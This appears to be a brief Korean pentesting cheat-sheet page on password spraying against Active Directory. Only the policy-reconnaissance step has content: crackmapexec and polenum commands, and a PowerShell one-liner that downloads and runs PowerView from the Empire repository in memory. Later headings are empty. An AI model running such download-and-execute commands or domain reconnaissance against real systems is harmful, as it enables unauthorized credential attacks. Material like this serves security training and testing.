비밀번호 스프레이 공격
MITRE ATTACK - T1110.003
AD 비밀번호 정책 확인
# Crackmapexec
cme smb <ip/FQDN> -u <user> -p <pass> -d <domain> --pass-pol Pdd
# polenum
polenum '<user>:<pass>'@<ip> --domain choi.local# Powerview
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/BC-SECURITY/Empire/master/empire/server/data/module_source/situational_awareness/network/powerview.ps1')
(Get-DomainPolicy).SystemAccess
# 기본 AD 파워쉘 모듈
Get-ADDefaultDomainPasswordPolicy유저 명단 확보
스프레이 공격
레퍼런스
Last updated